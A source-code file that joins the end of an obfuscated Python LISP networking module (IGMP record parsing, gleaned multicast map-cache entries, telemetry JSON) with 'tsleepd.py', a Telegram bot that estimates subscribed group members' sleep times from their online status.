if 57 - 57: I1IiiI * OOooOOo . i11iIiiIii * oO0o - OoOoOO00
iIiIi11IiiI11ii = "BBHI"
i11iIiI1i11I1 = struct . calcsize ( iIiIi11IiiI11ii )
OOOO0o = "I"
i1ooOOO = struct . calcsize ( OOOO0o )
i1IIi1ii1i1ii = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
if 40 - 40: OoOoOO00 - i1IIi . i11iIiiIii + OOooOOo
if 68 - 68: OoooooooOO / I1Ii111 + oO0o - I11i . I1Ii111 / oO0o
if 44 - 44: O0 / OOooOOo / I1Ii111 * o0oOOo0O0Ooo + OoOoOO00 / I1ii11iIi11i
if 1 - 1: OoO0O00 - OOooOOo . OOooOOo . IiII / I1Ii111 . IiII
IIiI1 = [ ]
for IiIIi1IiiIiI in range ( ooOO0o0O0 ) :
if ( len ( oOooo0 ) < i11iIiI1i11I1 ) : return
i1III1 , O0O , IIii111I11I , ii1i1II11II1i = struct . unpack ( iIiIi11IiiI11ii ,
oOooo0 [ : i11iIiI1i11I1 ] )
if 100 - 100: iIii1I11I1II1 . oO0o
oOooo0 = oOooo0 [ i11iIiI1i11I1 : : ]
if 86 - 86: Ii1I
if ( lisp_igmp_record_types . has_key ( i1III1 ) == False ) :
lprint ( "Invalid record type {}" . format ( i1III1 ) )
continue
if 36 - 36: i11iIiiIii % i11iIiiIii
if 91 - 91: Oo0Ooo + I1Ii111 % iII111i
i1iI1I = lisp_igmp_record_types [ i1III1 ]
IIii111I11I = socket . ntohs ( IIii111I11I )
IIi1iiIII11 . address = socket . ntohl ( ii1i1II11II1i )
iI1i1iIi1iiII = IIi1iiIII11 . print_address_no_iid ( )
if 42 - 42: iII111i - iII111i
lprint ( "Record type: {}, group: {}, source-count: {}" . format ( i1iI1I , iI1i1iIi1iiII , IIii111I11I ) )
if 93 - 93: I11i * iIii1I11I1II1
if 89 - 89: II111iiii . O0
if 28 - 28: I1ii11iIi11i * IiII
if 34 - 34: o0oOOo0O0Ooo . OOooOOo
if 61 - 61: I1IiiI / i1IIi % oO0o * OoO0O00 - II111iiii
if 2 - 2: I1IiiI . ooOoO0o
if 82 - 82: O0 / oO0o
i11iIi = False
if ( i1III1 in ( 1 , 5 ) ) : i11iIi = True
if ( i1III1 in ( 2 , 4 ) and IIii111I11I == 0 ) : i11iIi = True
Iii1i1III = "join" if ( i11iIi ) else "leave"
if 100 - 100: OoO0O00
if 18 - 18: I1ii11iIi11i . OoO0O00 - I1Ii111 + OoO0O00 + II111iiii
if 12 - 12: I1Ii111 % I1ii11iIi11i - I1Ii111 + I11i
if 62 - 62: I1Ii111 % I11i % IiII - ooOoO0o . oO0o - OoooooooOO
if ( iI1i1iIi1iiII . find ( "224.0.0." ) != - 1 ) :
lprint ( "Suppress registration for link-local groups" )
continue
if 14 - 14: OOooOOo + Oo0Ooo % i1IIi + iIii1I11I1II1
if 64 - 64: OoOoOO00 / Ii1I * Oo0Ooo - I1ii11iIi11i
if 9 - 9: i11iIiiIii % Oo0Ooo + IiII + Ii1I . ooOoO0o / i1IIi
if 40 - 40: I1Ii111 + I1IiiI - Ii1I
if 27 - 27: i1IIi
if 66 - 66: iII111i - ooOoO0o / i11iIiiIii + I1ii11iIi11i - Ii1I
if 9 - 9: O0
if 96 - 96: Oo0Ooo . II111iiii
if ( IIii111I11I == 0 ) :
IIiI1 . append ( [ None , iI1i1iIi1iiII , i11iIi ] )
lprint ( "IGMPv3 {} (*, {})" . format ( bold ( Iii1i1III , False ) ,
bold ( iI1i1iIi1iiII , False ) ) )
if 41 - 41: I1ii11iIi11i % o0oOOo0O0Ooo
if 86 - 86: O0 * OoOoOO00 * O0 / O0
if 50 - 50: OoooooooOO
if 42 - 42: ooOoO0o / OoooooooOO
if 31 - 31: II111iiii + Ii1I . iIii1I11I1II1 * OoO0O00 - O0 - OoO0O00
for OO00O0O in range ( IIii111I11I ) :
if ( len ( oOooo0 ) < i1ooOOO ) : return
ii1i1II11II1i = struct . unpack ( OOOO0o , oOooo0 [ : i1ooOOO ] ) [ 0 ]
i1IIi1ii1i1ii . address = socket . ntohl ( ii1i1II11II1i )
iI1i1i = i1IIi1ii1i1ii . print_address_no_iid ( )
IIiI1 . append ( [ iI1i1i , iI1i1iIi1iiII , i11iIi ] )
lprint ( "{} ({}, {})" . format ( Iii1i1III ,
green ( iI1i1i , False ) , bold ( iI1i1iIi1iiII , False ) ) )
oOooo0 = oOooo0 [ i1ooOOO : : ]
if 81 - 81: Oo0Ooo + IiII + iII111i * II111iiii
if 100 - 100: o0oOOo0O0Ooo * i1IIi - i11iIiiIii / iII111i % II111iiii
if 75 - 75: I11i
if 70 - 70: iIii1I11I1II1 * i1IIi * OOooOOo - Oo0Ooo % i1IIi
if 60 - 60: o0oOOo0O0Ooo . OOooOOo % II111iiii - I1ii11iIi11i
if 4 - 4: OOooOOo % ooOoO0o
if 39 - 39: Ii1I
if 67 - 67: iIii1I11I1II1 - OOooOOo
return ( IIiI1 )
if 47 - 47: OOooOOo - OOooOOo * I1Ii111
if 24 - 24: I1ii11iIi11i
if 37 - 37: II111iiii - iIii1I11I1II1 / o0oOOo0O0Ooo . O0 + II111iiii
if 9 - 9: o0oOOo0O0Ooo
if 47 - 47: Ii1I * I1Ii111 / II111iiii
if 73 - 73: ooOoO0o
if 53 - 53: IiII . Oo0Ooo
if 54 - 54: i11iIiiIii % ooOoO0o % I1Ii111 + o0oOOo0O0Ooo
lisp_geid = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
if 2 - 2: IiII
def lisp_glean_map_cache ( seid , rloc , encap_port , igmp ) :
if 25 - 25: OoOoOO00 . OoO0O00 * o0oOOo0O0Ooo . OoooooooOO - Oo0Ooo + I1IiiI
if 82 - 82: OoO0O00 - Ii1I * I11i * o0oOOo0O0Ooo
if 17 - 17: OoooooooOO + I1Ii111
if 91 - 91: iIii1I11I1II1 % i11iIiiIii - o0oOOo0O0Ooo
if 98 - 98: o0oOOo0O0Ooo % II111iiii * IiII - i11iIiiIii * oO0o
if 15 - 15: O0 - II111iiii - Oo0Ooo . I1ii11iIi11i % OoO0O00
OO0O0 = True
o0o000Oo = lisp_map_cache . lookup_cache ( seid , True )
if ( o0o000Oo and len ( o0o000Oo . rloc_set ) != 0 ) :
o0o000Oo . last_refresh_time = lisp_get_timestamp ( )
if 60 - 60: I1IiiI - O0 + OOooOOo * i11iIiiIii * i1IIi
iiIi11I1I = o0o000Oo . rloc_set [ 0 ]
iIIIIii1I = iiIi11I1I . rloc
o0Ooo000OoO = iiIi11I1I . translated_port
OO0O0 = ( iIIIIii1I . is_exact_match ( rloc ) == False or
o0Ooo000OoO != encap_port )
if 82 - 82: IiII + I1Ii111 * oO0o + Ii1I / I1IiiI
if ( OO0O0 ) :
oOo = green ( seid . print_address ( ) , False )
O0OOOO0o0O = red ( rloc . print_address_no_iid ( ) + ":" + str ( encap_port ) , False )
lprint ( "Change gleaned EID {} to RLOC {}" . format ( oOo , O0OOOO0o0O ) )
iiIi11I1I . delete_from_rloc_probe_list ( o0o000Oo . eid , o0o000Oo . group )
lisp_change_gleaned_multicast ( seid , rloc , encap_port )
if 34 - 34: I11i . O0 + IiII - i11iIiiIii
else :
o0o000Oo = lisp_mapping ( "" , "" , [ ] )
o0o000Oo . eid . copy_address ( seid )
o0o000Oo . mapping_source . copy_address ( rloc )
o0o000Oo . map_cache_ttl = LISP_GLEAN_TTL
o0o000Oo . gleaned = True
oOo = green ( seid . print_address ( ) , False )
O0OOOO0o0O = red ( rloc . print_address_no_iid ( ) + ":" + str ( encap_port ) , False )
lprint ( "Add gleaned EID {} to map-cache with RLOC {}" . format ( oOo , O0OOOO0o0O ) )
o0o000Oo . add_cache ( )
if 55 - 55: Oo0Ooo / Oo0Ooo - I1IiiI / OoO0O00 / oO0o * iII111i
if 78 - 78: iIii1I11I1II1 + I1ii11iIi11i
if 48 - 48: I1IiiI
if 59 - 59: I1Ii111 + iIii1I11I1II1 . Oo0Ooo - Ii1I . o0oOOo0O0Ooo * i11iIiiIii
if 89 - 89: O0 % iIii1I11I1II1 . I1ii11iIi11i + OOooOOo / IiII
if ( OO0O0 ) :
i1III111 = lisp_rloc ( )
i1III111 . store_translated_rloc ( rloc , encap_port )
i1III111 . add_to_rloc_probe_list ( o0o000Oo . eid , o0o000Oo . group )
i1III111 . priority = 253
i1III111 . mpriority = 255
OoO0oOOooOO = [ i1III111 ]
o0o000Oo . rloc_set = OoO0oOOooOO
o0o000Oo . build_best_rloc_set ( )
if 84 - 84: i11iIiiIii . Oo0Ooo + OoOoOO00
if 75 - 75: o0oOOo0O0Ooo
if 54 - 54: o0oOOo0O0Ooo
if 95 - 95: Ii1I % I11i - OoooooooOO
if 11 - 11: OoO0O00 - oO0o
if ( igmp == None ) : return
if 50 - 50: II111iiii * IiII
if 26 - 26: OoO0O00 . II111iiii
if 19 - 19: iII111i / i11iIiiIii
if 31 - 31: I1Ii111 / I1Ii111 % IiII
if 68 - 68: O0 / OOooOOo % OoOoOO00
lisp_geid . instance_id = seid . instance_id
if 68 - 68: OoooooooOO - IiII + I1IiiI * IiII / I11i - OoO0O00
if 69 - 69: oO0o / II111iiii
if 56 - 56: i1IIi + II111iiii + Ii1I . OoooooooOO
if 26 - 26: OoooooooOO % Ii1I % I11i * oO0o - i1IIi - i1IIi
if 76 - 76: i11iIiiIii + OoO0O00 - iII111i . OoOoOO00 * Oo0Ooo
Oo0O0Oo0oo = lisp_process_igmp_packet ( igmp )
if ( type ( Oo0O0Oo0oo ) == bool ) : return
if 15 - 15: II111iiii + iIii1I11I1II1
for i1IIi1ii1i1ii , IIi1iiIII11 , i11iIi in Oo0O0Oo0oo :
if ( i1IIi1ii1i1ii != None ) : continue
if 100 - 100: OOooOOo
if 43 - 43: OoO0O00 + I1Ii111 + OoOoOO00
if 78 - 78: I11i
if 30 - 30: iIii1I11I1II1
lisp_geid . store_address ( IIi1iiIII11 )
iII1 , O0O , IIIi1i1iIIIi = lisp_allow_gleaning ( seid , lisp_geid , rloc )
if ( iII1 == False ) : continue
if 74 - 74: I1IiiI - Oo0Ooo - i1IIi . iIii1I11I1II1 - I11i
if ( i11iIi ) :
lisp_build_gleaned_multicast ( seid , lisp_geid , rloc , encap_port ,
True )
else :
lisp_remove_gleaned_multicast ( seid , lisp_geid )
if 57 - 57: I1IiiI - i11iIiiIii - I1ii11iIi11i
if 49 - 49: i1IIi . O0 % Ii1I * i1IIi
if 39 - 39: I1ii11iIi11i
if 74 - 74: II111iiii % oO0o * Oo0Ooo / iIii1I11I1II1
if 81 - 81: II111iiii + OoOoOO00 * O0
if 64 - 64: iIii1I11I1II1 * Ii1I
if 5 - 5: I11i . I11i / i1IIi - o0oOOo0O0Ooo % Oo0Ooo
if 85 - 85: OOooOOo
if 32 - 32: iII111i
if 27 - 27: iIii1I11I1II1 - iII111i
if 68 - 68: oO0o + OoooooooOO - i1IIi * OoOoOO00 % Oo0Ooo
if 19 - 19: IiII * Oo0Ooo + I1IiiI * I1Ii111 % iIii1I11I1II1
def lisp_is_json_telemetry ( json_string ) :
try :
iiiiIIiI = json . loads ( json_string )
if ( type ( iiiiIIiI ) != dict ) : return ( None )
except :
lprint ( "Could not decode telemetry json: {}" . format ( json_string ) )
return ( None )
if 15 - 15: II111iiii % OoO0O00 % Oo0Ooo + I1Ii111
if 54 - 54: I1Ii111 + OOooOOo
if ( iiiiIIiI . has_key ( "type" ) == False ) : return ( None )
if ( iiiiIIiI . has_key ( "sub-type" ) == False ) : return ( None )
if ( iiiiIIiI [ "type" ] != "telemetry" ) : return ( None )
if ( iiiiIIiI [ "sub-type" ] != "timestamps" ) : return ( None )
return ( iiiiIIiI )
if 6 - 6: Ii1I
if 8 - 8: OoO0O00
if 91 - 91: Ii1I
if 12 - 12: OoooooooOO + i11iIiiIii
if 63 - 63: OOooOOo . i11iIiiIii
if 50 - 50: IiII % i11iIiiIii - iII111i . OoOoOO00 / Oo0Ooo
if 30 - 30: Oo0Ooo . II111iiii + OoooooooOO % OoO0O00 * ooOoO0o * iIii1I11I1II1
if 91 - 91: OoooooooOO
if 86 - 86: iII111i / OoooooooOO - I1ii11iIi11i
if 63 - 63: ooOoO0o % Ii1I * I1IiiI
if 48 - 48: iII111i - iII111i - o0oOOo0O0Ooo + ooOoO0o - o0oOOo0O0Ooo / Ii1I
if 43 - 43: I1IiiI + Ii1I
def lisp_encode_telemetry ( json_string , ii = "?" , io = "?" , ei = "?" , eo = "?" ) :
iiiiIIiI = lisp_is_json_telemetry ( json_string )
if ( iiiiIIiI == None ) : return ( json_string )
if 37 - 37: OoOoOO00 - OoooooooOO . ooOoO0o - IiII % iIii1I11I1II1 . iIii1I11I1II1
if ( iiiiIIiI [ "itr-in" ] == "?" ) : iiiiIIiI [ "itr-in" ] = ii
if ( iiiiIIiI [ "itr-out" ] == "?" ) : iiiiIIiI [ "itr-out" ] = io
if ( iiiiIIiI [ "etr-in" ] == "?" ) : iiiiIIiI [ "etr-in" ] = ei
if ( iiiiIIiI [ "etr-out" ] == "?" ) : iiiiIIiI [ "etr-out" ] = eo
json_string = json . dumps ( iiiiIIiI )
return ( json_string )
if 64 - 64: OoOoOO00 + iII111i % I1Ii111 - OOooOOo + O0
if 83 - 83: I1Ii111 + I1Ii111
if 43 - 43: oO0o * i1IIi * Ii1I . iIii1I11I1II1 % o0oOOo0O0Ooo
if 97 - 97: I1IiiI . i1IIi * OoOoOO00 / OOooOOo
if 50 - 50: II111iiii . OoO0O00
if 60 - 60: I11i . iIii1I11I1II1
if 41 - 41: II111iiii / I1IiiI
if 2 - 2: IiII / OoOoOO00 + I11i
if 3 - 3: OoooooooOO + Oo0Ooo + OOooOOo
if 20 - 20: Ii1I - oO0o - OoO0O00 + I1ii11iIi11i % OoO0O00 . i1IIi
if 2 - 2: ooOoO0o * IiII . Ii1I
if 69 - 69: IiII % i1IIi
def lisp_decode_telemetry ( json_string ) :
iiiiIIiI = lisp_is_json_telemetry ( json_string )
if ( iiiiIIiI == None ) : return ( { } )
return ( iiiiIIiI )
if 17 - 17: o0oOOo0O0Ooo . OoO0O00 * ooOoO0o * II111iiii - OoooooooOO % iII111i
if 47 - 47: I1IiiI * iIii1I11I1II1 - I11i - o0oOOo0O0Ooo
if 47 - 47: IiII + OoO0O00 % ooOoO0o - iII111i - IiII - oO0o
if 63 - 63: OoooooooOO / I1Ii111
if 90 - 90: I1Ii111 . i11iIiiIii - iIii1I11I1II1 + I1Ii111
if 67 - 67: IiII - I1ii11iIi11i + ooOoO0o . iIii1I11I1II1 . IiII
if 13 - 13: I1IiiI / i11iIiiIii % iIii1I11I1II1 - Oo0Ooo . i11iIiiIii + I1IiiI
if 77 - 77: o0oOOo0O0Ooo / II111iiii + i11iIiiIii % Ii1I . iIii1I11I1II1
if 66 - 66: iII111i / oO0o - OoO0O00 . Oo0Ooo
def lisp_telemetry_configured ( ) :
if ( lisp_json_list . has_key ( "telemetry" ) == False ) : return ( None )
if 31 - 31: IiII % O0
II11iii = lisp_json_list [ "telemetry" ] . json_string
if ( lisp_is_json_telemetry ( II11iii ) == None ) : return ( None )
if 46 - 46: iIii1I11I1II1 - OoooooooOO . oO0o % iIii1I11I1II1 / i1IIi + Ii1I
return ( II11iii )
if 5 - 5: I1ii11iIi11i % II111iiii
if 17 - 17: i11iIiiIii - II111iiii / O0 % OoO0O00 . Oo0Ooo + IiII
if 60 - 60: I11i % I1IiiI
# dd678faae9ac167bc83abf78e5cb2f3f0688d3a3
|
tsleepd.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
'''
Trusted Sleep Monitor Bot
This bot monitors group members' sleep time using online status.
Threads:
* tg-cli
* Event: set online state
* Telegram API polling
* /status - List sleeping status
* /average - List statistics about sleep time
* /help - About the bot
* /start - Describe how to use
* /settz - Set user timezone
* /subscribe - Add user to watchlist
* /unsubscribe - Remove user from watchlist
* Main
* SQLite
* Member
* Basic info
* Subscribed?
* Timezone
* Sleep start/end events
'''
import os
import re
import sys
import math
import time
import json
import queue
import signal
import sqlite3
import logging
import gettext
import datetime
import requests
import operator
import functools
import itertools
import threading
import collections
import concurrent.futures
import pytz
import tgcli
import humanizetime
re_zoneloc = re.compile(r'([+-]\d{4,7})([+-]\d{4,7})')
logging.basicConfig(stream=sys.stderr, format='%(asctime)s [%(name)s:%(levelname)s] %(message)s', level=logging.DEBUG if sys.argv[-1] == '-v' else logging.INFO)
logger_botapi = logging.getLogger('botapi')
executor = concurrent.futures.ThreadPoolExecutor(5)
HSession = requests.Session()
class AttrDict(dict):
def __init__(self, *args, **kwargs):
super(AttrDict, self).__init__(*args, **kwargs)
self.__dict__ = self
# Cli bot
tg_mktime = lambda s: time.mktime(time.strptime(s, '%Y-%m-%d %H:%M:%S'))
def handle_tg_update(obj):
try:
if obj.get('event') in ('message', 'service'):
#update_user(obj['from'])
user_event(obj['from'], obj['date'])
if 'when' in obj['from']:
user_event(obj['from'], tg_mktime(obj['from']['when']))
elif obj.get('event') == 'online-status':
#update_user(obj['user'])
try:
# it's localtime
user_event(obj['user'], tg_mktime(obj['when']))
except ValueError:
pass
except Exception:
logging.exception("can't handle message event")
def tg_get_members(chat):
chattype = chat.get('type')
# To ensure the id is valid
TGCLI.cmd_dialog_list()
if chattype == 'group':
peername = 'chat#id%d' % (-chat['id'])
obj = TGCLI.cmd_chat_info(peername)
return obj['members']
elif chattype == 'supergroup':
peername = 'channel#id%d' % (-chat['id'] - 1000000000000)
members = items = TGCLI.cmd_channel_get_members(peername, 100)
dcount = 100
while items:
items = TGCLI.cmd_channel_get_members(peername, 100, dcount)
members.extend(items)
dcount += 100
return members
else:
return
# API bot
class BotAPIFailed(Exception):
pass
def async_func(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
def func_noerr(*args, **kwargs):
try:
func(*args, **kwargs)
except Exception:
logger_botapi.exception('Async function failed.')
executor.submit(func_noerr, *args, **kwargs)
return wrapped
def bot_api(method, **params):
for att in range(3):
try:
req = HSession.get(('https://api.telegram.org/bot%s/' %
CFG.apitoken) + method, params=params, timeout=45)
retjson = req.content
ret = json.loads(retjson.decode('utf-8'))
break
except Exception as ex:
if att < 1:
time.sleep((att + 1) * 2)
else:
raise ex
if not ret['ok']:
raise BotAPIFailed(repr(ret))
return ret['result']
@async_func
def sendmsg(text, chat_id, reply_to_message_id=None):
text = text.strip()
if not text:
logger_botapi.warning('Empty message ignored: %s, %s' % (chat_id, reply_to_message_id))
return
logger_botapi.info('sendMessage(%s): %s' % (len(text), text[:20]))
if len(text) > 2000:
text = text[:1999] + '…'
reply_id = reply_to_message_id
if reply_to_message_id and reply_to_message_id < 0:
reply_id = None
return bot_api('sendMessage', chat_id=chat_id, text=text, reply_to_message_id=reply_id)
def updatebotinfo():
global CFG
d = bot_api('getMe')
CFG['username'] = d.get('username')
CFG['nickname'] = d.get('first_name')
def getupdates():
global CFG
while 1:
try:
updates = bot_api('getUpdates', offset=CFG['offset'], timeout=10)
except Exception:
logger_botapi.exception('Get updates failed.')
continue
if updates:
logger_botapi.debug('Messages coming.')
CFG['offset'] = updates[-1]["update_id"] + 1
for upd in updates:
MSG_Q.put(upd)
time.sleep(.2)
def parse_cmd(text: str):
t = text.strip().replace('\xa0', ' ').split(' ', 1)
if not t:
return (None, None)
cmd = t[0].rsplit('@', 1)
if len(cmd[0]) < 2 or cmd[0][0] != "/":
return (None, None)
if len(cmd) > 1 and 'username' in CFG and cmd[-1] != CFG['username']:
return (None, None)
expr = t[1] if len(t) > 1 else ''
return (cmd[0][1:], expr.strip())
def handle_api_update(d):
logger_botapi.debug('Msg arrived: %r' % d)
if 'message' in d:
try:
msg = d['message']
update_user(msg['from'])
user_event(msg['from'], msg['date'])
cmd, expr = parse_cmd(msg.get('text', ''))
if cmd in COMMANDS:
logger_botapi.info('Command: /%s %s' % (cmd, expr))
COMMANDS[cmd](expr, msg['chat']['id'], msg['message_id'], msg)
elif msg['chat']['type'] == 'private':
sendmsg(_('Invalid command. Send /help for help.'), msg['chat']['id'], msg['message_id'])
else:
update_user_group(msg['from'], msg['chat'])
except Exception:
logger_botapi.exception('Failed to process a message.')
# Processing
class _TimezoneLocationDict(pytz.LazyDict):
"""Map timezone to its principal location."""
def __getitem__(self, key):
if self.data is None:
_fill_lock.acquire()
try:
if self.data is None:
self._fill()
finally:
_fill_lock.release()
return self.data[key]
def _convert_coordinates(self, match):
lat_text, lon_text = match.groups()
if len(lat_text) < 7:
lat = int(lat_text[:-2]) + int(lat_text[-2:]) / 60
else:
lat = int(lat_text[:-4]) + int(lat_text[-4:-2]) / 60 + int(lat_text[-2:]) / 3600
if len(lon_text) < 7:
lon = int(lon_text[:-2]) + int(lon_text[-2:]) / 60
else:
lon = int(lon_text[:-4]) + int(lon_text[-4:-2]) / 60 + int(lon_text[-2:]) / 3600
return (lat, lon)
def _fill(self):
data = {}
zone_tab = pytz.open_resource('zone.tab')
try:
for line in zone_tab:
line = line.decode('UTF-8')
if line.startswith('#'):
continue
code, coordinates, zone = line.split(None, 4)[:3]
match = re_zoneloc.match(coordinates)
if match:
data[zone] = self._convert_coordinates(match)
self.data = data
finally:
zone_tab.close()
timezone_location = _TimezoneLocationDict()
def init_db():
global DB, CONN
DB = sqlite3.connect(CFG['database'])
DB.row_factory = sqlite3.Row
CONN = DB.cursor()
CONN.execute('CREATE TABLE IF NOT EXISTS users ('
'id INTEGER PRIMARY KEY,' # peer_id
'username TEXT,'
'first_name TEXT,'
'last_name TEXT,'
'subscribed INTEGER,'
'timezone TEXT'
')')
CONN.execute('CREATE TABLE IF NOT EXISTS user_chats ('
'user INTEGER,'
'chat INTEGER,'
'PRIMARY KEY (user, chat),'
'FOREIGN KEY (user) REFERENCES users(id)'
')')
CONN.execute('CREATE TABLE IF NOT EXISTS events ('
'user INTEGER,'
'time INTEGER,'
'PRIMARY KEY (user, time),'
'FOREIGN KEY (user) REFERENCES users(id)'
')')
CONN.execute('CREATE TABLE IF NOT EXISTS sleep ('
'user INTEGER,'
'time INTEGER,'
'duration INTEGER,'
'PRIMARY KEY (user, time),'
'FOREIGN KEY (user) REFERENCES users(id)'
')')
users = {}
for row in CONN.execute('SELECT * FROM users'):
users[row['id']] = dict(row)
return users
def update_user_group(user, chat):
if chat['type'].endswith('group'):
uid = user.get('peer_id') or user['id']
CONN.execute('INSERT OR IGNORE INTO user_chats (user, chat) VALUES (?, ?)', (uid, chat['id']))
def update_user(user, subscribed=None, timezone=None):
uid = user.get('peer_id') or user['id']
if uid in USER_CACHE:
updkey = ''
updval = [user.get('username') or None, user.get('first_name', ''),
user.get('last_name')]
USER_CACHE[uid]['username'] = updval[0]
USER_CACHE[uid]['first_name'] = updval[1]
USER_CACHE[uid]['last_name'] = updval[2]
if subscribed is not None:
updkey += ', subscribed=?'
updval.append(subscribed)
USER_CACHE[uid]['subscribed'] = subscribed
if timezone:
updkey += ', timezone=?'
updval.append(timezone)
USER_CACHE[uid]['timezone'] = timezone
updval.append(uid)
CONN.execute('UPDATE users SET username=?, first_name=?, last_name=?%s WHERE id=?' % updkey, updval)
else:
USER_CACHE[uid] = user
timezone = USER_CACHE[uid]['timezone'] = timezone or CFG['defaulttz']
subscribed = USER_CACHE[uid]['subscribed'] = subscribed or 0
CONN.execute('REPLACE INTO users VALUES (?,?,?,?,?,?)',
(uid, user.get('username') or None, user.get('first_name', ''),
user.get('last_name'), subscribed, timezone))
def user_event(user, eventtime):
uid = user.get('peer_id') or user['id']
if uid in USER_CACHE and USER_CACHE[uid]['subscribed']:
# https://github.com/vysheng/tg/wiki/Scripting-notes
# > To check whether a user is online, update the contact list and
# > compare user_status["when"] with the current time. If the status
# > is in the future, the contact is online right now.
now = int(time.time())
if eventtime > now:
eventtime = now
CONN.execute('INSERT OR IGNORE INTO events (user, time) VALUES (?, ?)', (uid, eventtime))
def user_last_seen(user):
uid = user.get('peer_id') or user['id']
if uid in USER_CACHE and USER_CACHE[uid]['subscribed']:
res = CONN.execute('SELECT time FROM events WHERE '
'user = ? ORDER BY time DESC LIMIT 1', (uid,)).fetchone()
if res:
return res[0]
def hour_minutes(seconds, zpad=True):
m = round(seconds / 60)
h, m = divmod(m, 60)
if zpad:
return '%02d:%02d' % (h, m)
else:
return '%d:%02d' % (h, m)
def replace_dt_time(fromdatetime, seconds):
tz = fromdatetime.tzinfo
return tz.normalize(datetime.datetime.combine(fromdatetime,
datetime.time(tzinfo=tz)) + datetime.timedelta(seconds=seconds))
def replace_dt_hours(fromdatetime, hours):
tz = fromdatetime.tzinfo
return tz.normalize(datetime.datetime.combine(fromdatetime,
datetime.time(tzinfo=tz)) + datetime.timedelta(hours=hours))
def midnight_delta(fromdatetime, adjust=True):
fromtimestamp = fromdatetime.timestamp()
midnight = datetime.datetime.combine(fromdatetime,
datetime.time(tzinfo=fromdatetime.tzinfo)).timestamp()
delta = fromtimestamp - midnight
if adjust and delta > 43200:
return delta - 86400
else:
return delta
midnight_adjust = lambda delta: delta + 86400 if delta < 0 else delta
def tz_is_day(dt, tzname, lat=None, lon=None):
timezone = dt.tzinfo
offset = timezone.utcoffset(dt).total_seconds() / 240
clocktime = midnight_delta(dt, False) / 3600
if lat is None:
if tzname in timezone_location:
lat, lon = timezone_location[tzname]
elif 6 <= clocktime < 18:
return True
else:
return False
localtime = (clocktime + (lon-offset) / 15 + 24) % 24
a = 2 * math.pi * (dt.timetuple().tm_yday + localtime / 24) / 365
phi = 0.006918 - 0.399912 * math.cos(a) + 0.070257*math.sin(a) - \
0.006758 * math.cos(2*a) + 0.000907 * math.sin(2*a) - \
0.002697 * math.cos(3*a) + 0.001480 * math.sin(3*a)
latrad = math.radians(lat)
h0 = math.asin(math.cos(math.radians((localtime - 12) * 15)) *
math.cos(latrad) * math.cos(phi) + math.sin(latrad) * math.sin(phi))
return (h0 > 0)
def user_status(uid, events):
'''
Identify sleep time using rules as follows:
-24h 0 6 now
/=====================\ <- SELECT
. x-+-----------+----💤?
. | x-----+----💤?
. | | x 🌞?
. x-+--------x x| xx
. x-+-----------+--x
. xx| x------x x| xx
. | x x-------+-x
. x | x------+--x
. x | x-------x | 🌞?
x . | | 🌞?
. x | | x 🌞?
Legend:
x user event
. select boundary (last 24h)
- sleep duration
| cut window (0:00 ~ 6:00 local time)
💤 maybe sleeping
🌞 maybe awake
'''
start, interval = None, None
usertime = datetime.datetime.now(pytz.timezone(USER_CACHE[uid]['timezone']))
window = (replace_dt_time(usertime, CFG['cutwindow'][0]).timestamp(),
replace_dt_time(usertime, CFG['cutwindow'][1]).timestamp())
lasttime = None
left, right = None, None
complete = True
intervals = []
for _user, etime in events:
if lasttime:
intervals.append((etime - lasttime, lasttime))
lasttime = etime
if etime > window[1]:
right = etime
break
elif etime > window[1]:
if left:
intervals.append((etime - left, left))
lasttime = right = etime
break
elif etime < window[0]:
left = etime
elif left:
intervals.append((etime - left, left))
lasttime = etime
if etime > window[1]:
right = etime
break
else:
lasttime = etime
if intervals:
complete = right is not None
interval, start = max(intervals)
if interval > CFG['threshold']:
# offline for too long
start = interval = None
elif lasttime:
start = lasttime
elif left:
start = left
# else: pass
if interval is None and start and usertime.timestamp() - start > CFG['threshold']:
# also offline for too long
start = None
return start, interval, complete
def user_status_update(uid):
expires = time.time() - 86400
start, interval, complete = user_status(uid, CONN.execute(
'SELECT events.user, events.time FROM events'
' INNER JOIN users ON events.user = users.id'
' WHERE events.user = ? AND events.time >= ?'
' AND users.subscribed = 1'
' ORDER BY events.user ASC, events.time ASC', (uid, expires)))
if start and interval and complete:
CONN.execute('REPLACE INTO sleep (user, time, duration) VALUES (?,?,?)',
(uid, start, interval))
return start, interval, complete
def group_status_update(chat):
expires = time.time() - 86400
uid = chat['id']
stats = []
for user, group in itertools.groupby(tuple(CONN.execute(
'SELECT events.user, events.time FROM events'
' INNER JOIN users ON events.user = users.id'
' INNER JOIN user_chats ON events.user = user_chats.user'
' WHERE user_chats.chat = ? AND events.time >= ?'
' AND users.subscribed = 1'
' ORDER BY events.user ASC, events.time ASC', (uid, expires))),
key=operator.itemgetter(0)):
start, interval, complete = user_status(user, group)
stats.append((user, start, interval))
if start and interval and complete:
CONN.execute('REPLACE INTO sleep (user, time, duration) VALUES (?,?,?)',
(user, start, interval))
stats.sort(key=lambda x: (-x[2] if x[2] else 0, x[1] or float('inf'), x[0]))
return stats
def all_status_update():
expires = time.time() - 86400
stats = []
for user, group in itertools.groupby(tuple(CONN.execute(
'SELECT events.user, events.time FROM events'
' INNER JOIN users ON events.user = users.id'
' WHERE events.time >= ? AND users.subscribed = 1'
' ORDER BY events.user ASC, events.time ASC', (expires,))),
key=operator.itemgetter(0)):
start, interval, complete = user_status(user, group)
stats.append((user, start, interval))
if start and interval and complete:
CONN.execute('REPLACE INTO sleep (user, time, duration) VALUES (?,?,?)',
(user, start, interval))
CONN.execute('DELETE FROM events WHERE time < ?', (expires,))
CONN.execute('DELETE FROM sleep WHERE duration > ?', (CFG['threshold'],))
return stats
def update_group_members(chat):
members = None
try:
members = tg_get_members(chat)
except Exception:
pass
if members:
for m in members:
update_user_group(m, chat)
if 'when' in m:
user_event(m, tg_mktime(m['when']))
@functools.lru_cache(maxsize=100)
def db_getuidbyname(username):
if username.startswith('#'):
try:
return int(username[1:])
except ValueError:
return None
else:
uid = CONN.execute('SELECT id FROM users WHERE username LIKE ?', (username,)).fetchone()
if uid:
return uid[0]
def cmd_status(expr, chatid, replyid, msg):
'''/status [all|@username] - List sleeping status'''
if expr and expr[0] == '@':
uid = db_getuidbyname(expr[1:])
if not uid:
sendmsg(_('User not found.'), chatid, replyid)
return
elif 'reply_to_message' in msg:
uid = msg['reply_to_message']['from']['id']
elif expr == 'all' and chatid < 0:
uid = None
else:
